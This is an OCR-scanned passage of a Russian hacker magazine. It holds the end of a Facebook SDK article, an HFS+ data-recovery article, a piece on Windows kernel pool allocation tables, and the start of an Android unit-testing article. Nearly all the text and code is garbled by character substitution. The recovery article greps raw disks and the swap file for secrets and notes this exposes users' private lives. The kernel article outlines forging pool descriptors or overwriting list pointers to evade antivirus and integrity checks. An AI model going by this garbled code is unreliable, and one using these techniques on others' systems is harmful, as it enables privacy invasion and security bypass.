настоящий моментуже не работают. Чтобыты нетратил свое драгоцен- 
ное время зря, я сразу рекомендую тебе присмотреться к библиотеке 
ЕасеЬоок С# 5РК ( ІасеЬоокзсІк.сосІерІех.сот ) и ЕасеЬоок Оеѵеіорег 
Тоокіі [ [асеЬоокІооІкіЕсосІерІех.сопп ). С их помощьюты за считанные 
минуты научишься создавать десктоп ные/ѵѵеЬ/ЭіІѵегІідЫ-приложения, 
взаимодействующие с ЕасеЬоок. Добавь ко всему этому возможность 
работы под ѴѴіпсІоѵѵз РЬопе 7, и становится однозначно понятно, что 
обе библиотеки тизі Ьаѵе! 

Обе библиотеки хороши, но я больше предпочитаю использовать вто- 
рую. Почему? Нет, я не имею ничего против ЕасеЬоок С# 5РК, но с ЕРТ 
я познакомился немного раньше иуспел привыкнуть кней. Длятого 
чтобы начать разработку своего первого проекта для ЕасеЬоок, тебе 
потребуется пройти на \А/\д/ѵѵіасеЬоок.сопп/#!/сІеѵе[орег5/ и создать 
новый арріісабоп. Подобную процедуру™ выполнял при разработке 
приложения для РгорВох. Выполнив эту нехитрую операцию, ты по- 
лучишь ключ, который и будешь использовать в проекте. Ну а дальше 
все стандартно. Имея на руках ключ приложения и ЕРТ, ты можешь 
приступать к разработке своих программ. В ЕРТ есть все необходимое 
для организации поиска друзей, отправки сообщений ит.д. Длинных 
примеров кода приводить не стану. Где их найти — сам знаешь. 

Заключение 

На этом я хочу закончить статью и пожелать тебе оставаться все время 
втеме. Смотри, что сделали разработчики, качай 5РК и пробуй по- 
казать пользователям уже готовые идеи с другой стороны. Помни, что 
пользователи согласны платить нетолько за абсолютно новые фишки, 
но и красивые обертки для давно существующих. Прояви фантазию и 
будь уверен, что твои работы будут за мечены. На этом разреши попро- 
щаться. Увидимся в будущем! т 
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СООІЫО 



■ ■ Захаров Всеволод (зеѵагаѵіпдгасі.ги) 




ОТКАЛЫВАЕМ 

ЯБЛОДАННЫЕ 

Изучаем восстановление данных в Мае 05 X 

©В это трудно поверить, но так называемые «непродвинутые» 
пользователи иногда удаляют важные данные и потом громко о них 
сожалеют. Расхлебывать их проблемы приходится программистам, 
поэтому сейчас мы разберемся в том, как Мае 03 X хранит данные 
на носителях, и как эти данные можно восстановить. 

ІПІТО 

Для использования в Мае 05, Арріе разработала свою собствен- Длина имени файла 

ную файловую систему НР5 (Ніегагсбісаі Рііе Зузіепп). В настоящее Кодировка имен файлов 
время ей на смену пришла РІР5+, которая используется в Мае 05, Нода каталога 

начиная с версии 8.1 . Структура тома, использующего РІР5+, близка Максимальный размер файла 
к НР5, но в то же время содержит некоторые отличия. Основные 
характеристики этих двух систем: Как видишь, РІР5+ была создана, чтобы наиболее эффективно ис- 



НР5 НР5+ 

31 255 

Мае Котап ІІпісосІе 
512 байт 4 Кбайт 
2 Л 31 2 Л 63 
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пользовать дисковое пространство для томов больших размеров и 
фрагментированных файлов. 

НР5+ внутри 

НР5 делит дисковое пространство на блоки одинакового размера. 
Для идентификации блока используется 1 6 бит, стало быть, всего 
можетбыть 65536таких блоков, при этом каждый блокзанимает 
целое число секторов. Очевидно, что такая система приводит к 
потере большого пространства на больших томах. 

В свою очередь НР5+ использует32 бита для нумерации блоков, 
что позволяет использовать пространство более рационально. 
Для управления размещением данных на диске РІР8+ хранит на 
нем также и служебную информацию — метаданные. Среди них 
наиболее важны для работы файловой системы и наиболее инте- 
ресны нам в деле поиска пропавших данных: 

• Ѵоіите Ьеабег (за головок тома). Содержит общую информацию 

о томе. РІапример, размер блока данных и информацию о располо- 
жении других блоков метаданных на диске. 

• Аііосаііоп іііе (файл размещения или карта тома). Віітар, в 
котором отмечен статус каждого блока на диске. (1 — занят, 0 — 
свободен.) 

• Саіаіод іііе (каталог). В нем хранится большая часть данных о 
размещении файлов и папок на диске. 

• Ехіепіз оѵегРоѵѵ Іііе. Содержит метаданные, которые не разме- 
стились в каталоге. 

• АИгіЬиІез Ріе (файл атрибутов). Используются для контроля до- 
ступа и т.п. 

• ЗоигпаІРІе (журнал). Хранит данные о транзакциях, выполнен- 
ных для данного тома. 

Саіаіод Ріе, ехіепіз оѵегііоѵѵ Ріе и аіігібиіе Ріе — представляют 
собой В-деревья. 

За гол о во к том а всегда размещается по фиксированному смеще- 
нию 1024 байта от начала тома. Он содержит общую информацию 



Структура НР5+ 



о томе — в том числе и о размещении других служебных структур 
НР5+ на диске. Так, например, щита II пІоВІоск — размеще- 
ние журнала, если для этой системы ведется журналирование, 
аІІосаРопРіІе-блок, с которого начинается карта размещения 
файлов на диске, саіаіодрііе — размещение файла каталога. 

Заголовоктома НР5+ 

БІігисѣ НРБРІивѴоІитеНеасІег 
{ 



Шпі:16 


5І§па1:иге; 


Шпі:16 


ѵегБІоп; 


Шпі:32 


а1:1:гіЬи1:е5; 


Шпі:32 


ІаБІіМоипІіесІѴегБІоп; 


Шпі:32 


доигпаІІгѵРоВІоск; 


Шпі:32 


сгеа1:еОа1:е; 


Шпі:32 


тосІі-руОа1:е; 


Шпі:32 


ЬаскирОаѣе; 


Шпі:32 


сІіескесЮаІіе; 


Шпі:32 


РІеСоипІ:; 


Шпі:32 


-РоІсІегСоиітЩ 


Шпі:32 


ЬІоскБііе; 


Шпі:32 


1:о1:а1В1оск5; 


ІЛпі:32 


■РгееВІоскБ; 


Шпі:32 


пех1:А11оса1:іоп; 


Шпі:32 


ГБгеСІитрБіге; 


Шпі:32 


сІаІіаСІитрБіге; 


НР5Са1:а1о§І\ІосІеІ0 пех1:Са1:а1о§ІО; 


Шпі:32 


ыгі1:еСоип1:; 


Шп1:64 


епсосІіп§5Ві1:тар; 


Шпі:32 


РпсІепІп-Ро[8] ; 


НР5Р1и5Рогк0а1:а 


аІІосаЛопРіІе; 


НР5Р1иБРогкОа1:а 


ехѣепІіБРіІе; 


НР5Р1иБРогкОа1:а 


са1:а1о§Рі1е; 


НР5Р1иБРогкОа1:а 


а1:1:гіЬи1:е5Рі1е; 


НР5Р1иБРогкОа1:а 


5І:ап1:ирРі1е; 



}; 



Запись саіаіод Іііе 

Бѣгисі: НР5Р1и5Са1:а1о§Рі1е 

{ 

5Іп1:1б гесопсІТуре; 

ІІІпііІб Яа§5; 

Шп1:32 геБегѵесІІ; 

НР5Саі:а1о§І\ІосІеІО бІеЮ; 

1)Іп1:32 сгеа1:еОа1:е; 

ІЛ пі: 32 соп1:еп1:МосЮа1:е; 

ІЛ пі: 32 а1:1:гіЬи1:еМосЮа1:е; 

ІЛ пі:32 ассѳББРаІіе; 

ІЛ пі:32 Ьаскирйаііе; 

НРЗРІиБРегтІББІопБ регтІББІопБ ; 

РІгѵРо иБегІгѵРо; 

РХІігРо -Ріпсіег ІггРо; 

ІЛ пі: 32 1:ех1:ЕпсосІіп§;ІІІп1:32 ге5егѵесІ2; 
НР5Р1иБРогкОа1:а сІаІіаРогк; 
НРБРІиБРопкйаІіа геБоипсеРогк; 

}; 



Саіаіод Іііе содержит метаданные файлов и папок в виде отдельных 
записей. ІЧосІе Ю (С І\ІЮ) — это уникальный номер ноды файловой 
системы. Самая важная информация в записи саіаіод Іііе’а — это 
данные о размещении файла, в которые входят 
восемь записей из стартового блока и длины в блоках непрерывной 
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части фрагмента файла (бэгк’а). Если этого недостаточно, осталь- 
ные данные о форках файла есть в Ехіепі оѵегбоѵѵ біе. 

Запись ^огк-а файла 

зіігисі: НРБРІизРогкОаІіа 

{ 

Шп1:64 1о§іса15І2е; 

Шп1:32 сІитрБііе; 

Шп1:32 1:о1:а1В1оск5; 

НР5Р1иБЕх1:еп1:КесогсІ ех1:еп1:5; 

}; 

Журнал НЕ5+ — это непрерывный набор блоков транзакций, кото- 
рый никогда не перемещается и его размер не изменяется. Иначе 
говоря, он представляет собой циклический буфер фиксирован- 
ного размера, который содержит записи транзакций НЕ5+. На 
одну транзакцию может быть выделен один или несколько списков 
блоков операций. Список состоит из заголовка списка, за которым 
следуют собственно данные. На этом, пожалуй, мы закончим скуч- 
ное знакомство с внутренностями НЕ5+, поскольку ничего секрет- 
ного тут нет — это открытый формат и более подробное описание 
ты можешь найти на официальном сайте Арріе. 

Низкоуровневый доступ к ФС и 
восстановление данных 

По восстановлению информации в МасОБ НЕБ и НЕ5+ написано 
гораздо меньше мануалов, чем для других систем, да и выполнить 
это восстановление сложнее. Трудности появляются из-за того, 
что НЕ5+ используются В-деревья для хранения метаданных 
о размещении файлов. После того как какой-то файл удален, 

В -дере во тут же обновляется, и информация о размещении уда- 
ленного файла теряется. С выпуском МасО5Х10.2в августе 2002 
года Арріе усовершенствовала НЕ5+, добавив журнал, который 



хранит все изменения файловой системы в блоках транзакций. 
Журналирование может быть разрешено или запрещено пользо- 
вателем в процессе работы. ВМасОБХверсии 10. 2по умолчанию 
журналирование запрещено. В Мае 05 X 1 0.3 и более поздних оно 
по умолчанию разрешено. То есть, на всей современной технике 
сМас 05 Хизменения файловой системы журналируются. Однако 
журнал был добавлен в НЕ5+ не для восстановления утраченных 
данных, а для поддержания целостности ФС в случае исключи- 
тельных ситуаций. Простое действие пользователя порождает 
множество изменений в файловой системе. Так, при создании 
файла, например, происходит следующее: 

• В Саіаіод біе добавляется нода нового файла. 

• Віітартома изменяется, чтобы корректно отразить информацию 
о занятых блоках. 

• Также записи будут добавлены в Ехіепі оѵегбоѵѵ, если файл силь- 
но фрагментирован. 

• Файл атрибутов обновляется. 

• За гол о во к том а обновляется, чтобы зафиксировать факт измене- 
ния файловой системы. 

Все эти изменения могут привести ктому, что файловая система 
будет повреждена, поскольку в процессе этих действий может 
произойти отключение питания или извлечение съемного носите- 
ля. Журналирование как раз и помогает решить эту проблему. 
Транзакция в журналируемой НЕ5+ включает следующие шаги: 

1 . Начать транзакцию копированием всех предполагаемых из- 
менений в файл журнала. 

2 . Записать журнал из буфера на диск. 

3. Записать фа кт транзакции в за головок журнала. 

4 . Провести запланированные изменения. 

5 . Пометить транзакцию завершенной. 

При монтировании файловой системы НЕ5+ система проверяет 
журнал на предмет незавершенныхтранзакций. Еслитаковые 
есть, то файловая система будет исправлена. 
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Наконец-то восстанавливаем 
данныеТ 

Как же использовать журнал для восстановления поврежденных 
файлов? Необходимо выполнить следующие действия: 

1 . Читаем за головок том а 

2 . Получаем доступ к Саіаіод Рііе 

3. Находим размемещение файла журнала 

4 . Читаем его в память 

5 . Находим там записи об удаленных файлах 

6. Если блоки, принадлежащие удаленным файлам еще не пере- 
записаны (проверяем по Віітар), читаем их и восстанавливаем 
данные. 

Здесь вроде бы все понятно, но есть одна проблема — размер 
журнала ограничен и периодически его содержимое перекрывает- 
ся. Журнал загрузочного тома Мас-тіпі обычно перекрывается за 
5-10 минут. Журнал загрузочного тома МасВоок'а перекрывается 
за 30 минут. Если на томе работает Ті те МасЫпе, то журнал пере- 
крывается каждые 20 секунд. В общем, перезапись идет довольно 
активно. Поэтому перед восстановлением том лучше смонтировать 
только для чтения: 

тксііг /ѴоІитев/МуѴоІите 

тоипі: -1: бТз -г /сІеѵ/сІІ5кХХХХ /ѴоІитез/МуѴоІите 

Так мы сохраним журнал и к то му же предотвратим перезапись 
блоков удаленных файлов, которые помечены в Ьіітар'етома как 
свободные. 

По принципу анализа журнала НЕ5+ работает множество софтин, 
которые ты легко можешь найти в Сети, и большого смысла писать 
под это дело свою — нет. 

Посмотрим, что можно сделать руками в консоли. Хорошо разо- 
бравшись в структуре НЕ8+, ты сможешь, используя стандартную 
утилиту «б б», которая позволяет дампить участки диска в файл, 
анализировать журнал и картутома в консоли. Хотя это, конечно, 
оченьутомительно :). 

Вот пример чтения одного блока по заданному адресу: 

зибо бб і-р=/беѵ/бІ5к1 оТ= . /еѵібепсе Ьз=409б \ 

5кір=43555ѲѲ соип1:=1 

Если есть какие-то предположения о содержимом файла и, тем 
более, если это текстовый файл, можно проделать та кой трюк: 

зибо с а* /беѵ/бізкі | зігіп^з -о | §гер -і \ 

' зесгеі: собе ' -С 5 

Если блоки удаленного файла еще не были перезаписаны, то этот 
способ позволит полностью восстановить файл. 

Даже если блоки файла перезаписаны, например, с использова- 
нием специальных утилит, аналогичных збгеб, данные файла могут 
еще остаться в виртуальной памяти — то есть, в файле подкачки. В 
Мае 05 X файл подкачки хранится в /ѵаг/ѵт 

$ 1 з -аі /ѵаг/ѵт 
іоіаі 131072 

бгмхг-хг-х 4 гооі: мбееі 136 Осі: 14 10:50 . 
бгмхг-хг-х 24 гооі: мбееі 816 Осі: 14 10:52 . . 
бгмх--х--х 18 гооі: мбееі 612 Осі: 11 11:20 арр_рго61е 
-гы Т 1 гооі: мбееі 67108864 Осі: 14 10:50 зыарбіе 

И тогда, проанализировав своп: 

зибо з1:гіп§5 -о /ѵаг/ѵт/змарбіе | §гер 'зесгеі: собе' -С 2 



ты можешь найти фрагменты файла, которые еще остались висеть 
в буфере. 

Для доступа к служебным структурам файловой системы в своем 
коде ты можешь использовать файлы гаѵѵ-устройств. Как прави- 
ло, на /беѵ/гбізкОзІ находится ЕЕІ раздел, а НЕ5+ раздел на /беѵ/ 
гб і з к 0 з 2 . Кроме того, в бЫ/бЫДюгтакб уже есть готовые описания 
структур данных НЕ5+, которые тебе могут пригодиться. 

#ітрогі <б-Рз/б-Рз_-Рогта1: . б> 

#ітрог1: < иѣіі . И > 

ѵоіб битр(ипзі§пеб сбаг * ЬиТ, зІ 2 е_ 1 : Іеп) 

{ 

■Рог (зІ 2 е_і і = 0; і < Іеп; ++і) 
ргіп1:-Р( "%02Х ", Ьи-Р [ і ] ) ; 

} 

іпі: таіп(іп1: аг§с, сбаг *аг§ѵ[]) 

{ 

// Открываем файл устройства 

// Можно для краткости использовать и беѵореп 

іпі: -Рб = ореп( "/беѵ/гбізк052" , 0_К00І\ІІ_Ѵ ); 

// Описание заголовка есть в б-Рз_-Рогта1: . б 
НРБРІизѴоІитеНеабег ѵо1ите_беабег; 

// Заголовок лежит по смещению 1024 
іпі: гб = ргеаб(Тб, &ѵо1ите_беабег, 

5І2ео-Р(ѵо1ите_беабег) , 0x400); 

// Теперь у нас есть вся основная инфа 
// о томе 

ргіпі-Р( "%и\п" , ѵо1ите_беабег. ЬІоскБіге) ; 

битр( (сбаг*)&ѵо1ите_беабег, зігеоі (ѵо1ите_беабег) ) ; 

// Не забываем закрывать устройство 
сІозе(Тб) ; 

} 

Запускать проги, которые взаимодействуют с гаѵѵ-устройствами, 
нужно через зибо, так как делать это можеттолько админ и судоеры. 

Тіте МасЫпе 

НачинаясМасОЗХ Ьеорагб, в состав системы входит Тіте 
МасЫпе. Эта утилита создает резервные копии файлов, записывая 
все изменения, происходящие с файловой системой. Перечислен- 
ные действия позволяют пользователю восстановить всю систему, 
несколько файлов или один отдельный файл в том виде, в котором 
он находился в определенный момент времени. 

Для работы Тіте Масбіпе необходимо выделить отдельный диск. 
Арріе вы пускает специальное устройство Арріе Тіте Сарзиіе, 
которое используется каксетевой дискспециально для резервных 
ко пий Тіте Масбіпе. Тіте Масбіпе может использоваться и с любым 
115В или еЗаІа -диском. При первом запуске Тіте Масбіпе создает 
папку на указанном резервном диске, содержащую все данные. 
Потом Тіте Масбіпе бдует копировать только измененные файлы. В 
общем, если для диска используется Тіте Масбіпе, то восстановле- 
ние утраченных данных не представляет особых проблем. 

Оиіго 

Информация очень редко исчезает бесследно. Хорошо зная работу 
файловой системы, можно восстановить даже то, что считалось 
безвозвратно потерянным, ну и вообще — узнать много интересно- 
го изличной жизни пользователя, т 
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Бурим ядро с целью поиска новых 
способов перехвата 



о Как перехватить данные в ѴѴіпсІоѵѵз? Ответ на этот вопрос, 
казалось бы, очевиден. Всякий человек, мало-мальски разбираю- 
щийся в вопросах кодинга систем безопасности, ответит - нужен 
перехват специфических функций. В частности, для работы 
с памятью. Зто верно. Но сегодня мы постараемся поковырять эту 
тему чуть глубже, чем это принято в цивилизованном обществе. 



Так какие же еще способы можно предложить, кроме перехвата 
функций? Пожалуй, этот вопрос поставит в тупик две трети про- 
граммистов. Более-менее подкованные кодеры, почесав затылок, 
смогут вспомнить отаком неочевидном способе, какскан РОЕ/ 
РТЕ-таблиц интересующего нас процесса или, в случае проще, о 
простом сканировании адресного пространства процесса. На этом 
способе, кстати, основаны многие программы типа АгіМопеу и 
схожие с ней. 

А еще способы есть? Да такие, чтобы не трогать напрямую адресное 
пространство процесса? Наверное, есть. Будем искать :). 

Организация памяти в ѴѴіпсІоѵѵз 

Говорить я сегодня буду, как это часто со мной случается, о ядре. 
Вернее, об организации памяти в ядре и о том, как эту самую «орга- 
низацию» можно использовать в наших коварных планах. 



И ежу, думаю, понятно, что ядро ѴѴіпсІоѵѵз содержит несколько АРІ - 
функций, предназначенных для выделения и освобождения памя- 
ти. Виртуальная память в ѴѴіпсІоѵѵз организована в виде «блоков», 
которые называются «страницами». В архитектуре Іпіеі х86, размер 
каждой страницы равен 4096 байтам. При этом функции, пред- 
назначенные для выделения/освобождения памяти вѴѴіпсІоѵѵз 
(ЕхАІІосаІеРооІѴѴііЬТад и ЕхЕгееРооІА/ѴіШТад), могут «хранить» 
неиспользуемые никем блоки памяти для следующих выделений 
памяти. Внутренние функции напрямую взаимодействуют с желе- 
зом каждый раз, когда нужно выделить страницу. При этом все эти 
процедуры очень сложны и требуют крайне нежного обращения. 

Захватываем память в ѴѴіпсІоѵѵз 

Если ты хоть раз сталкивался с написанием драйверов под 
ѴѴіпсІоѵѵз, тебе должно быть знакомо разделение памяти на под- 
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Рисунок 1. ѴѴігЮВб показывает внутренности РСРВ 



качиваемую (радей) и неподкачиваемую (попрадей). 
Разница между ними вполне ясна — если ядро выде- 
ляет память в подкачиваемой памяти, то со временем, 
чтобы не захламлять оперативную память компьютера, 
она просто сбрасывается на жесткий диск и существует 
там в виде файла радебіе.зуз. В нем, как правило, хра- 
нятся радеб-секции драйверов и куча прочей шняги. 
ІЧопрадеб-память на диск никогда не сбрасывается и 
постоянно держится в оперативной памяти. Поэтому 
при ее выделении нужно быть крайне экономным и 
не использовать ее без особой нужды. К примеру, в 
попрадеб пуле хранятся ключевые секции драйверов и 
самого ядра. Не буду долго расписывать все прелести 
использования подкачиваемой и неподкачиваемой 
памяти, материала эту тему полно в Сети. Да и твой 
любимый журнал ][ не раз писал об организации памяти 
в ѴѴіпбоѵѵз. Добавлю лишь, что обработка подкачивае- 
мой и неподкачиваемой памяти ядром принципиально 
отличается одна от другой. 

Запрос блоков памяти у железа требует времени, и 
ѴѴіпбоѵѵз старается балансировать между скоростью и 
необходимостью избегать траты оперативной памяти, 
которой всегда мало. Механизм выделения памяти 
обязан выдавать запрошенные куски памяти нужного 
объема как можно быстрее. При этом время отклика на 
запрос выделения памяти проходит быстрее, если эти 
куски памяти находятся в соседствующих аллокациях. 
Поэтому для удобства и для обеспечения быстродей- 
ствия при выделении памяти в ядре существуюттри 
различные таблицы, которые отличаются между собой 
лишьтем, блоки памяти какого размера они описывают. 
Другими словами, при манипулировании памятью 
ядро смотрит на эти таблицы, из которых получает и 



записывает необходимую информацию о том, сколько 
памяти выделено, какого размера и где блоки памяти 
находятся. 

Каждая таблица реализуетсвои способы хранения 
информации о выделенных блоках памяти. 

Рассмотрим каждую таблицу отдельно. 

Первая таблица, РРЫРадебІооказібеЫзІ — это ас- 
социативная таблица (1_ооказібеІ_із1:), существующая 
отдельно для каждого процессора и описывающая 
выделенные куски попрадеб-памяти размером <= 256 
байт. Каждый процессор обладаеттак называемым РСР 
— «регистром контроля процессора» (ргосеззог сопігоі 
гедізіег), который хранит информацию о таких вещах, 
как уровень ІНС!І_, ОРТ, ЮТ и т.д. Расширение этого ре- 
гистра, названное РСРВ — «регион контроля процессо- 
ра» (ргосеззог сопігоі гедіоп), хранит в себе указатель 
на эту очень любопытную таблицу (см. рис. 1). 

В ѴѴіпбоѵѵз Зеплегка внутренняя структура КРРСВ не- 
много изменилась, но, думаю, общая концепция понят- 
на — КРРСВ содержит в себе данные об использовании 
текущим процессором выделенной памяти: 

Иуребе-Р бИшсі: _КРКСВ { 

/*0х5АѲ*/ зіігисі: 

_РР_І_ООКА5ЮЕ_І_І5Т РРІ_оока5ІбеІ_І5И[16] ; 
/*0х620*/ БТгисТ _СЕМЕКАІ__І_ООКА5ЮЕ_РООІ_ 
РРМРа§ебІ_оока5ІбеІ_І5І:[32] ; 

/*0хР20*/ БТгисІ: _СЕМЕКАІ__І_ООКА5ЮЕ_РООІ 
РРРа§ебІ_оока5ІбеІ_І5І:[32] ; 

} КРКСВ, *РКРКСВ; 
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ЬаскіпІбеЬох.огд 

— на этом сайте ты 
сможешь найти много 
всяких вкусностей на 
тему программирова- 
ния и безопасности. 



ХАКЕР 07 /1 50/ 201 1 



► 107 






СООІЫО 



нмиспг со 1т х 1 і | 




ІЬЬрнЯііч іррігмгіі«» I пгт Е«лІ«тѴѴѴ] и №№(«7 

Нгн ОрсѵАс йіігг жіінкімд і ]ір [ег|іХХ| (!Т 44 )Н) 

Рисунок 2. Отлинковка описателей блоков памяти в 
МтЫопРадесІРооІРгееизІНеаб 

По сравнению с простыми двусторонними таблицами, такие 
ассоциативные таблицы позволяют процессору быстрее выделять 
память. 

Для работы с этими таблицами используют внутреннюю функцию 
ЕхІпІегІоскебРорЕпІгуЗЫБІ;. 

Вторая таблица зависит оттого, сколько процессоров использует- 
ся, и как система управляет ими. 

Система выделения памяти использует эту таблицу, если размер 
выделяемой памяти <= 4080 байт. Или же в том случае, если ассо- 
циативный поиск заканчивается ничем. Описатель такой таблицы 
имееттакую же структуру, как и Р00Е_0Е5СРІРТ0Р: 

Ѣуресіе-Р 5І:пис1: _Р00І__0Е5СКІРТ0К 

{ 

епи _РООІ__ТѴРЕ РооІТуре; 

ипіоп { 

з'ЬгисІ: _кеЦАК0Е0_миТЕХ Ра^есИоск; 

Ш-0ІМС32 І\ІопРаеесІІ_оск; 

}; 

І_ОІ\ІС32 Киппіп§А11ос5 ; 

І_ОІ\ІС32 Киппіп^ОеАПосз; 

ЮІЧС32 То*а1Ві§Ра§е5; 

І_0І\ІС32 ТІшеасІ5Ргосе5 5Іп§0е-РепгаІ5; 

Ш-0ІМС32 То-ЬаІВу^ез; 

ІЛ N18 _РАОО!ІЖ0_[0х2С]; 

Ш-0ІМС32 РооІІпсІех; 

ІЛ N18 _РАОО!ШС1_[0хЗС] ; 

І-0ІЧС32 ТоІаІРаеез; 

ІЛ N18 _РАОО]Ж2_[0хЗС]; 

ѴОЮ** РепсІіп§Ргее5; 

І_ОІ\ІС32 РепсІіп§Ргее0ер1:Іі; 

ІЛ N18 _РАООІМСЗ_[0х38] ; 

Біггисѣ _І_І5Т_ЕІ\ІТКѴ І_І5*:НеасІ5 [512] ; 

} РООІ__ОЕ5СКІРТОК, *РРООІ__ОЕ5СКІРТОК; 

Если на машине имеется лишь один процессор, то для по- 
лучения переменной РооІѴесІог используется указатель на 
ЫопРадебРооЮезсгірІог. 



Если же процессоров много, то используется таблица 
ЕхрІМопРадесІРооШезспрІог, которая содержит 1 6 слотов, занятых 
под описатели пула. 

При этом структура РРСВ каждого процессора указывает на струк- 
туру ККІСЮЕ, которая может быть слинкована между несколькими 
процессорами и может содержать несколько полей, используемых 
таблицей ЕхрІМопРадебРооЮевспрІог. 

Третья и последняя таблица, нареченная 

МтЫопРадебРооІЕгееизіНеаб, используется всеми процессора- 
ми в том случае, если нужно выделить блоки памяти больше, чем 
4080 байт. Она также используется ядром, если у первых двух та- 
блиц свободных ресурсов не осталось совсем. Эта таблица состоит 
из четырех списков и5Т_ЕІ\ІТРѴ, каждый из которых представляет 
собой номер страницы, за исключением самого последнего спи- 
ска, в котором хранится список (извини за тавтологию) страниц, 
занятых системой. 

Доступ к этой таблице защищен спи нл оком, который вызывается 
внутренней функцией ядра ЕоскОиеиеЫопРадесІРооІЕоск. 

Во время процедуры освобождения мелких блоков и очист- 
ки памяти функция ЕхЕгееРооІА/ѴііЬТад «склеивает» между 
собой такие блоки, после чего они попадают в таблицу 
МтЫопРадесІРооІЕгееиБІНеасІ уже в увеличенном размере. 

Уфф, пожалуй, я увлекся. Понимаю, что все вышеописанное сразу 
понять трудно, но за пасись терпением — и все встанет на свои 
места :).Такили иначе, думаю, пора двигаться к завершению. 

И напоследок... 

Итак, подведем итоги вышесказанного. Механизм выделения и 
освобождения памяти, по сути своей, зиждется на трехтаблицах 
ядра, которые во многом похожи между собой. При этом самое 
примечательное то, что описание выделенных блоков памяти в 
этих таблицах основано на широко известных ассоциативных или 
просто двусвязных списках. Найти эти таблицы в ядре не пред- 
ставляет особого труда. Правда, для этого нужно засандалить 
драйвер, что в ѴѴіпсіоѵѵб Ѵібіэ/ 7 сделать проблематично. Но речь 
сейчас не об этом. 

Только задумайся: ведь ничего не стоит злоумышлен нику вы- 
делить память, после чего вставить в таблицу свой описатель 
памяти, который будет обрабатываться ничего не подозревающим 
процессором как абсолютно законный! 

Примерно вот та ким образом (см. рис. 2). Помимо этого есть еще 
много способов поиздеваться над организацией памяти (таблица- 
ми) в ѴѴіпсіоѵѵб. Например, перезаписать указатель ІМехІ в ассоциа- 
тивной таблице Иоо казі сі е, вызвать РооЮѵегІЧоѵѵ путем переза- 
писи указателей в простых (односторонних) списках РепсІіпдЕгееБ 
(они находятся в хидере пула) и т.д. 

Вариантов много, и все они достаточно сложны для реализации. 
Однако при должных усилиях, прямых руках и умении копаться в 
отладчике — вырисовывается очень даже неплохая перспектива. 
Мне, правда, неизвестны факты использования описанной техни- 
ки в дикой природе, однако... кто знает, кто знает... 

Заключение 

Описанная в статье техника сводится к той удивительной катего- 
рии, когда для того, чтобы поставить систему на колени, достаточно 
лишь переписать пару байт в памяти, при этом не используя какие- 
либо хуки. 

Используя этутехнику, ты сможешь обойти самые неглупые ме- 
ханизмы обеспечения защиты операционной системы —такие, 
как сравнение кода или хэширование. Не хочу утверждать, что эта 
техника эксплуатации памяти в ѴѴіпсіоѵѵб всесторонне прекрасна 
и замечательна, однако при правильном и грамотном «употребле- 
нии» она способна вогнать в уныние разработчиков антивирусных 
и проактивных систем защиты. 

Удачного компилирования и да пребудет с тобой Сила! ц-ц 
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Программерские 
типсыитриксы, 
спецвыпуск: ТРР и АпсІгоісІ 



Изучаем 
модульное 
тестирование 
в сфере 
мобильного 
программинга 



О При разработке любого относительно сложного программного комплекса (особенно при разра- 
ботке систем, выполняющих сложные расчеты) программист большую часть времени тратит не на 
написание программного кода, а на его отладку. О том, как потратить это время с пользой мы 
сегодня тебе расскажем. 



В отладке программного обеспечения действуетта к называемый 
принцип Парето — в данном случае он можетбыть сформулирован как 
«На отладку 20%-ного кода уходит80% общего времени отладки». По- 
пробуем разобраться, почемутак происходит. Предположим, существует 
программа, выполняющая некоторые расчеты, алгоритм работы которой 
выглядит примерно как изображено на «Схеме 1 ». Также предположим, 
что в изначальной версии программы третий метод не был реализован 
(и, соответственно, не был учтен при проектировании архитектуры ПО). 
Однако в следующей версии программы понадобилосьего добавить. 

Как видно из блок-схемы (см. «Схему 1 »), третий метод оченьтрудно 
отлаживается, и в случае, если программист до пустит ошибку, найти ее 
при отладке будет очень сложно, так как из-за условного оператора этот 
метод будет вызываться крайне редко. Одним из выходов можетбыть 
написание небольшой отдельной программы для тестирования этого 
метода. Однако он не профессионален и зачастую слишком сложен — к 
примеру, если этот метод зависит от других классов. Для того чтобы из- 
бежать таких проблем, следуетиспользоватьмодульноетестирование. 
Модульноетестирование (англ, ипіііезбпд) — один из методов тестиро- 
вания программного обеспечения, при котором пишется отдельный на- 
бортестовдля каждого класса, состоящий изтестовдля каждого метода, 
объявленного в тестируемом классе. Подобная техника заменяет боль- 
шую часть отладки и значительно упрощает разработку приложения как 
на конечных, таки на начальныхстадиях, потому что позволяетпрове- 
рить все случаи поведения каждого метода тестируемого класса, что за- 
частую не представляется возможным при «ручной» отладке. К примеру, 
еслитребуется перебрать всезначения у аргумента функциитипа іп!:32, 

— у модульного теста это займет несколько минут, а тестировщик вряд ли 
вообще сможет справиться с этим заданием. Для еще большего упроще- 
ния и ускорения разработки рекомендуется использовать методологию 
разработки, называемую «Разработка через тестирование». Разработка 
через тестирование, или ТОО (англ. Тез! Огіѵеп Оеѵеіортепі), — один из 
видов экстремального программирования. Если в классических методах 
разработки сначала пишется программный код, а потом (приусловии 
использования модул ьныхтестов] —тесты, то в ТОО сначала пишутся 
модульные тесты, и только потом тестируемые классы и методы реализу- 
ются в программном коде. Графическое изображение ТОО можноувидеть 
на «Схеме 2». Несмотря на то, что этот метод относится кэкстремальному 
программированию, и, на первый взгляд, кажется абсурдным, он все 
чаще используется при разработке крупных программных продуктов. 




ерез 



/ьявляемые 

?иЖ^ разра ' 



• Код должен быть разделен на как можно более мелкие части 
•Должен выполняться принцип «один тест — одно действие», то есть 




Схема 1. Алгоритм работы программы 

один Іезі сазе не должен проверять правильность выполнения более чем 
одногодействия. Инициализация объектов должна производиться вне 
тестов. 

• Желательно выполнение принципа «один тест — один метод», то есть 
Іезі сазе должен содержать 1-2 строки кода. 

•Должны бытьсоблюденыуровни абстракции классов программы, то 
естьлогика программы недолжна бытьпривязана кинтерфейсу про- 
граммы. 

Преимущества разработки 
чёрез тестирс аниё 

• Отделениелогики программного продукта отинтерфейса пользователя 

• Какследствие из предыдущего пункта — упрощение процедуры по- 
вторного использования кода в других программных продуктах 

• Упрощение отладки, поддержки и доработки программного кода за счет 
разделения его на небольшие части 

• Меньшая вероятность неожиданного поведения программы 
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Наша подопытная 



Роберт Мартин, известный специалист в области экстре- 
мального программирования, предлагает использовать 
следующий алгоритм ТОР: «Сначала нужно добиться, чтобы 
кодхоть как-то работал, итолько потом улучшать его». На 
практике эта рекомендация выглядит следующим образом: 

1. Написать модульный тест для какого-либо метода (на 
данный моментеще не реализованного). Вследствие того, 
что метод еще не реализован, тестовый проект даже не 
скомпилируется. 

2. Написать «заглушку» для этого метода. К примеру, если 
